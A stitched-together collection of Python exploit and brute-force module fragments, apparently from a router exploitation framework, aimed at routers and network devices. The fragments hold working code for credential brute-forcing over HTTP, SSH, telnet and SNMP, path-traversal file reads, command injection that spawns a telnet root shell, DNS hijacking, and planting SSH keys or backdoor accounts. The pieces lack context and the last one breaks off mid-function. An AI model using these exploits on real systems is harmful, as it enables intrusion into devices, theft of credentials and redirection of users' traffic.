def ftp_get_config(self):
print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
self.ftp_port,
self.remote_user,
self.remote_pass))
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
ftp.login(self.remote_user, self.remote_pass)
print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
if self.config_path in ftp.nlst():
print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
r = StringIO()
ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
ftp.close()
data = r.getvalue()
creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
if creds:
print_success("Found encrypted credentials:")
print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
return creds
else:
print_error("Exploit failed - could not find any credentials")
except ftplib.all_errors:
print_error("Exploit failed - FTP error")
return None
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
if self.check():
print_success("Target is vulnerable")
url = "{}:{}".format(self.target, self.port)
print "Visit: {}/\n".format(url)
else:
print_error("Target seems to be not vulnerable")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self):
self.credentials = []
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(self.target, self.port))
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
rootpath = 'routersploit/modules/'
path = 'exploits/dlink/'
# only py exploit files
modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"]
vulns = []
for module_name in modules:
f = path + module_name
module = imp.load_source('module', rootpath + f + '.py')
exploit = module.Exploit()
exploit.target = self.target
exploit.port = self.port
res = exploit.check()
if res is True:
print_success("{} is vulnerable".format(f))
vulns.append(f)
elif res is False:
print_error("{} is not vulnerable".format(f))
else:
print_status("{} could not be verified".format(f))
print
if len(vulns):
print_success("Device is vulnerable!")
for v in vulns:
print " - {}".format(v)
else:
print_error("Device is not vulnerable to any exploits!")
print
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsel", method="wget", binary="wget", location="/var")
else:
print_error("Target is not vulnerable")
def run(self):
response = self.telnet_login()
if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
print_status("FTP and HTTP service active")
creds = self.ftp_get_config()
if creds:
print_status("Use javascript console (through developer tools) to bypass authentication:")
payload = ('var user = "******"\n'
'var hash2 = "{}";\n'
'var HA2 = MD5("GET" + ":" + uri);\n'
'document.getElementById("user").value = user;\n'
'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
'document.authform.submit();\n')
for user in creds:
print_success("User: {} Role: {}".format(user[0], user[2]))
print_info(payload.format(user[0], user[3]))
elif '}=>' in response:
print_success("Successful authentication through Telnet service")
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
tn.interact()
else:
print_error("Exploit failed - target seems to be not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
try:
print_info(self.execute(cmd))
except socket.timeout:
print_error("No response received. The exploit tends to be unstable though. It is worth trying to run the same command again.")
def run(self):
if self.check():
print_success("Target is vulnerable")
print "\nUse your browser:"
print "{}:{}/xslt".format(self.target, self.port)
else:
print_error("Target seems to be not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((self.target, 32764))
conf = self.execute(s, 1)
lines = re.split("\x00|\x01", conf)
pattern = re.compile('user(name)?|password|login');
credentials = []
for line in lines:
try:
(var, value) = line.split("=")
if len(value)>0 and pattern.search(var):
credentials.append((var, value))
except ValueError:
pass
if len(credentials):
print_table(("Parameter", "Value"), *credentials)
else:
print_error("Target is not vulnerable")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
string = data.next().strip()
bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string)
if res[0] is not None:
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self):
self.credentials = []
print_status("Running module...")
ssh = paramiko.SSHClient()
try:
ssh.connect(self.target, port=self.port)
except socket.error:
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ssh.close()
return
except:
pass
ssh.close()
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
file_path = "..{}".format(self.filename)
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {"html_response_page": file_path,
"action": "do_graph_auth",
"login_name": "test",
"login_pass": "******",
"&login_n": "test2",
"log_pass": "******",
"graph_code": "63778",
"session_id": "test5",
"test": "test"}
print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password))
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
if response is None:
return
if response.status_code == 200:
print_status("File: {}".format(self.filename))
print_info(response.text)
else:
print_error("Exploit failed - could not read response")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
creds = []
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
# print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
admin = re.findall("pwdAdmin = '(.+?)'", response.text)
if admin:
creds.append(('admin', admin[0]))
support = re.findall("pwdSupport = '(.+?)'", response.text)
if support:
creds.append(('support', support[0]))
user = re.findall("pwdUser = '******'", response.text)
if user:
creds.append(('user', user[0]))
if creds:
print_success("Credentials found!")
print_table(("Login", "Password"), *creds)
else:
print_error("Credentials could not be found")
def run(self):
cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnetport)
if self.execute1(cmd) or self.execute2(cmd):
self.telnet_connect()
else:
print_error("Exploit failed")
def run(self):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
print_error("Exploit Failed - SSH Service is down")
return
trans = client.get_transport()
try:
trans.auth_password(username='******', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
print_status("Error with Existing Session. Wait few minutes.")
return
try:
trans.auth_interactive(username='******', handler=self.custom_handler)
print_success("Exploit succeeded")
ssh_interactive(client)
except:
print_error("Exploit failed")
return
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
r = requests.post(url, headers=headers, data=postdata, verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self):
url = "{}:{}/UD/?5".format(self.target, self.port)
headers = {
"SOAPACTION": '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
"Content-Type": 'text/xml; charset="utf-8"',
"Expect": "100-continue",
}
data = (
'<?xml version="1.0"?>'
'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
"<s:Body>"
'<m:GetLoginPassword xmlns:m="urn:dslforum-org:service:UserInterface:1">'
"</m:GetLoginPassword>"
"</s:Body>"
"</s:Envelope>"
)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return
r = re.compile("<NewUserpassword>(.*?)</NewUserpassword>")
m = r.search(response.text)
if m:
print_success("Password has been found")
print_info("Password: {}".format(m.group(1)))
else:
print_error("Exploit failed - could not find password")
def run(self):
url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
try:
r = requests.get(url, verify=False)
res = r.text
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
data = []
for v in var:
regexp = '{}="(.+?)"'.format(v)
val = re.findall(regexp, res)
if len(val):
data.append((v, val[0]))
if len(data):
print_success("Exploit success")
headers = ("Option", "Value")
print_table(headers, *data)
else:
print_error("Exploit failed")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="none", method="awk", binary="awk")
else:
print_error("Target is not vulnerable")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
cmdGen = cmdgen.CommandGenerator()
while running.is_set():
try:
string = data.next().strip()
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(string),
cmdgen.UdpTransportTarget((self.target, int(self.port))),
'1.3.6.1.2.1.1.1.0',
)
if errorIndication or errorStatus:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
else:
if boolify(self.exit_on_success):
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error("Target: {}:{} {}: {} Username: '******' Password: '******'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def execute(self, cmd):
if len(cmd) > 237:
print_error('Your command must be at most 237 characters long. Longer strings might crash the server.')
return
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', 9999))
sock.settimeout(2)
packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
try:
sock.sendto(packet, (self.target, 9999))
except socket.error:
return ""
while True:
try:
data, addr = sock.recvfrom(512)
except socket.timeout:
sock.close()
return ""
if len(data) == 512 and data[1] == "\x16":
break
length = struct.unpack('<H', data[14:16])[0]
output = data[16:16+length]
sock.close()
return output
def run(self):
if self.check():
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
regexps = [("admin", "pwdAdmin = '(.+?)'"),
("support", "pwdSupport = '(.+?)'"),
("user", "pwdUser = '******'")]
creds = []
for regexp in regexps:
res = re.findall(regexp[1], response.text)
if len(res):
creds.append((regexp[0], b64decode(res[0])))
if len(creds):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
print("NOTE: Admin is commonly implemented as root")
else:
print_error("Credentials could not be found")
else:
print_error("Device seems to be not vulnerable")
def run(self):
url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
data = []
for v in var:
regexp = '{}="(.+?)"'.format(v)
val = re.findall(regexp, response.text)
if len(val):
data.append((v, val[0]))
if len(data):
print_success("Exploit success")
headers = ("Option", "Value")
print_table(headers, *data)
else:
print_error("Exploit failed")
def run(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../..{}".format(self.filename),
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "******",
"%3Apassword": "******",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
if response is None:
return
if response.status_code == 200:
print_success("Exploit success")
print_status("File: {}".format(self.filename))
print response.text
else:
print_error("Exploit failed")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending exploit payload")
sock.sendto(self.payload, (self.target, 43690))
try:
print_status("Waiting for response")
response = sock.recv(1024)
except:
print_error("Exploit failed - device seems to be not vulnerable")
return
if len(response):
print_success("Exploit success")
print_info(response)
def run(self):
url = "{}:{}/error_page.htm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return
creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)",
response.text)
if len(creds):
c = [("admin", creds[0])]
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *c)
else:
print_error("Credentials could not be found")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(
self.target, self.port, self.filename)
print_status("Sending paylaod request")
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and len(response.text):
print_success("Exploit success - reading {} file".format(
self.filename))
print_info(response.text)
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute1(self, cmd):
print_status("Trying to exploit first command injection vulnerability...")
url = "{}:{}/cgi-bin/adv_remotelog.asp".format(self.target, self.port)
payload = "1.1.1.1;{};#".format(cmd)
data = {"RemotelogEnable": "1",
"syslogServerAddr": payload,
"serverPort": "514"}
response = http_request(method="POST", url=url, data=data)
if response is not None and response.status_code != 404:
return True
print_error("Exploitation failed for unauthenticated command injection")
return False
def run(self):
url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return
val = re.findall('password = "******"', response.text)
if len(val):
print_success("Exploit success")
data = [('admin', val[0])]
headers = ("Login", "MD5 Password")
print_table(headers, *data)
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
def run(self):
if self.check():
url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(
self.target, self.port, self.filename)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and len(response.text):
print_success("Exploit success - reading file {}".format(
self.filename))
print_info(response.text)
else:
print_error("Exploit failed - could not read file")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(
self.target, self.port, self.filename)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and len(response.text):
print_success("Exploit success")
print_status("Reading file: {}".format(self.filename))
print_info(response.text)
else:
print_error("Exploit failed - could not read file")
else:
print_error("Exploit failed - device seems to be not vulnerable")
def run(self):
url = "{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}".format(self.target,
self.port,
self.dns1,
self.dns2)
print_status("Attempting to change DNS settings...")
print_status("Primary DNS: {}".format(self.dns1))
print_status("Secondary DNS: {}".format(self.dns2))
response = http_request(method="POST", url=url)
if response is None:
return
if response.status_code == 200:
print_success("DNS settings has been changed")
else:
print_error("Could not change DNS settings")
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target,
self.ssh_port,
timeout=5,
username=self.user,
password=self.password)
except (paramiko.ssh_exception.SSHException, socket.error):
print_error(
"Exploit failed - cannot log in with credentials {} / {}".
format(self.user, self.password))
return
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
url = "{}:{}{}".format(self.target, self.port, self.valid)
print_status("Sending request to download sensitive information")
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and len(response.text):
print_status("Reading {}".format(self.valid))
print_info(response.text)
else:
print_error("Exploit failed - could not retrieve response")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
url = "{}:{}/cgi-bin/webproc?getpage={}&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa".format(
self.target, self.port, self.filename)
response = http_request(method="GET",
url=url,
auth=(self.username, self.password))
if response is None:
return
if response.status_code == 200 and len(response.text):
print_success("Success! File: %s" % self.filename)
print response.text
else:
print_error("Exploit failed")
else:
print_error("Device seems to be not vulnerable")
def attack(self):
# todo: check if service is up
if self.snmp.startswith('file://'):
snmp = open(self.snmp[7:], 'r')
else:
snmp = [self.snmp]
collection = LockedIterator(snmp)
self.run_threads(self.threads, self.target_function, collection)
if len(self.strings):
print_success("Credentials found!")
headers = ("Target", "Port", "Community Strings")
print_table(headers, *self.strings)
else:
print_error("Valid community strings not found")
def run(self):
url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
self.port,
self.dns1,
self.dns2)
print_status("Attempting to change DNS settings...")
print_status("Primary DNS: {}".format(self.dns1))
print_status("Secondary DNS: {}".format(self.dns2))
response = http_request(method="POST", url=url)
if response is None:
return
if response.status_code == 200:
print_success("DNS settings has been changed")
else:
print_error("Could not change DNS settings")
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target,
22,
timeout=5,
username=self.username,
password=self.password)
except:
ssh.close()
else:
print_success("SSH - Successful authentication")
cmd = ""
while cmd not in ["quit", "exit"]:
cmd = raw_input("> ")
stdin, stdout, stderr = ssh.exec_command(cmd.strip())
print stdout.channel.recv(2048)
return
try:
tn = telnetlib.Telnet(self.target, 23)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication")
tn.write("\r\n")
tn.interact()
tn.close()
except:
print_error("Connection Error")
return
def run(self):
if self.device < 0 or self.device >= len(self.payloads):
print_error(
"Set target device - use \"show devices\" and \"set device <id>\""
)
return
if self.action not in ["set", "unset"]:
print_error(
"Specify action: set / unset credless authentication for Telnet service"
)
return
print_status("Trying to connect to Telnet service on port {}".format(
self.telnet_port))
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10.0)
s.connect((self.target, int(self.telnet_port)))
print_status("Connection OK")
print_status("Received bytes from telnet service: {}".format(
repr(s.recv(1024))))
except Exception:
print_error("Connection failed")
return
print_status("Building payload...")
payload = self.build_payload()
if self.action == 'set':
print_status("Setting credless privilege 15 authentication")
else:
print_status("Unsetting credless privilege 15 authentication")
print_status("Sending cluster option")
s.send(payload)
s.close()
print_status("Payload sent")
if self.action == 'set':
print_status("Connecting to Telnet service...")
try:
t = telnetlib.Telnet(self.target,
int(self.telnet_port),
timeout=10)
t.interact()
except Exception:
print_error("Exploit failed")
else:
print_status("Check if Telnet authentication was set back")
def login(self):
url = "{}:{}/login.cgi?logout=1".format(self.target, self.port)
data = {"username": self.username,
"password": self.password,
"target": ""}
print_status("Trying to authenticate")
response = http_request(method="POST", url=url, data=data, allow_redirects=False, session=self.session)
if response is None:
return False
if response.status_code == 302 and "CGISESSID" in response.cookies.keys():
print_status("CGI Session ID: {}".format(response.cookies['CGISESSID']))
print_success("Authenticated as {}:{}".format(self.username, self.password))
return True
print_error("Exploit failed. Could not authenticate.")
return False
def run(self):
url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(
self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return
creds = re.findall(
"<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>",
response.text)
if len(creds):
c = creds[0].split(":")
creds = [(c[0], c[1])]
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
else:
print_error("Credentials could not be found")
def run(self):
if self.check():
print_success('Target is vulnerable')
print_success('Trying to exploit by uploading SSH public key')
key = paramiko.RSAKey.generate(1024)
public_key = key.get_base64()
private_key = StringIO.StringIO()
key.write_private_key(private_key)
tmp_file_pubkey = tempfile.TemporaryFile()
tmp_file_pubkey.write('ssh-rsa ' + public_key)
tmp_file_pubkey.seek(0)
upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})}
upload_url = '{0}:{1}/login.cgi' .format(self.target, self.port)
response = http_request(url=upload_url, method='POST', files=upload_params)
if response is None:
print_error('Something was wrong while uploading the SSH Public Key')
return
print_success('Appareantly the exploit worked fine')
print_success('Trying to invoke a interactive SSH Shell')
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pseudo_privkey_file = StringIO.StringIO(private_key.getvalue())
pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file)
pseudo_privkey_file.close()
private_key.close()
ip_target = self.target.replace('https://', '')
ip_target = ip_target.replace('http://', '')
ip_target = ip_target.replace('/', '')
client.connect(ip_target, self.ssh_port, username='******', pkey=pkey)
ssh_interactive(client)
else:
print_error('Target is not vulnerable')
def run(self):
creds = []
url = "{}:{}/s_brief.htm".format(self.target, self.port)
print_status("Sending payload request")
response = http_request(method="GET", url=url)
if response is None:
return
print_status("Extracting credentials")
username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)
if len(username) and len(password):
print_success("Exploit success")
creds.append((username[0], password[0]))
print_table(("Login", "Password"), *creds)
else:
print_error("Exploit failed - could not extract credentials")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status(
"It is blind command injection - response is not available")
if self.arch == "mipsbe":
shell(self,
architecture="mipsbe",
method="wget",
location="/tmp")
elif self.arch == "mipsle":
shell(self,
architecture="mipsle",
method="wget",
location="/tmp")
else:
print_error("Target is not vulnerable")
def run(self):
self.session = requests.Session()
if self.check():
print_success("Target seems to be vulnerable")
if self.login():
if not self.newusername:
self.newusername = random_text(8)
if not self.newpassword:
self.newpassword = random_text(8)
self.create_ssh_backdoor(self.newusername, self.newpassword)
# Log into the SSH backdoor account
self.init_ssh_session(self.newusername, self.newpassword)
else:
print_error("Exploit failed. Could not log in")
else:
print_error("Exploit failed. Target seems to be not vulnerable.")
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port,
self.get_form_path()))
try:
requests.get(url, verify=False)
except (requests.exceptions.MissingSchema,
requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
# authentication type
if self.form == 'auto':
form_data = self.detect_form()
if form_data is None:
print_error("Could not detect form")
return
(form_action, self.data) = form_data
if form_action:
self.path = form_action
else:
self.data = self.form
print_status("Using following data: ", self.data)
# invalid authentication
self.invalid_auth()
# running threads
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def _deobfuscate(self, config):
def chain(lambdas, value):
r_chain = None
for l in lambdas:
r_chain = value = l(value)
return r_chain
arr_c = [
chain([
lambda d: ord(d), lambda d: (d + ord('y')) & 0xff, lambda d:
(d ^ ord('Z')) & 0xff, lambda d: (d - ord('e')) & 0xff
], t) for t in config
]
arr_c_len = len(arr_c)
tmp = ((arr_c[arr_c_len - 1] & 7) << 5) & 0xff
for t in reversed(xrange(arr_c_len)):
if t == 0:
ct = chain(
[lambda d: (d >> 3) & 0xff, lambda d:
(d + tmp) & 0xff], arr_c[t])
else:
ct = (((arr_c[t] >> 3) & 0xff) +
(((arr_c[t - 1] & 0x7) << 5) & 0xff)) & 0xff
arr_c[t] = ct
tmp_str = "".join(map(chr, arr_c))
ret_str = ""
if len(tmp_str) % 2 != 0:
print_error("Config file can't be deobfuscated.")
return None
for i in xrange(len(tmp_str) / 2):
ret_str += tmp_str[i + (len(tmp_str) / 2)] + tmp_str[i]
return ret_str
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
postdata = self.data.replace("{{USER}}", user).replace(
"{{PASS}}", password)
r = requests.post(url,
headers=headers,
data=postdata,
verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
else:
print_error(
name,
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def test_cookie(self, cookie_int):
"""
Method that tests all cookies from the past to find one that is valid
"""
url = "{}:{}/html/tUserAccountControl.htm".format(
self.target, self.port)
cookies = dict(RpWebID=str(cookie_int))
try:
r = http_request(method='GET',
url=url,
cookies=cookies,
timeout=10)
if ('NAME="OldPwd"' in r.text):
print_success("Cookie {} is valid!".format(cookie_int))
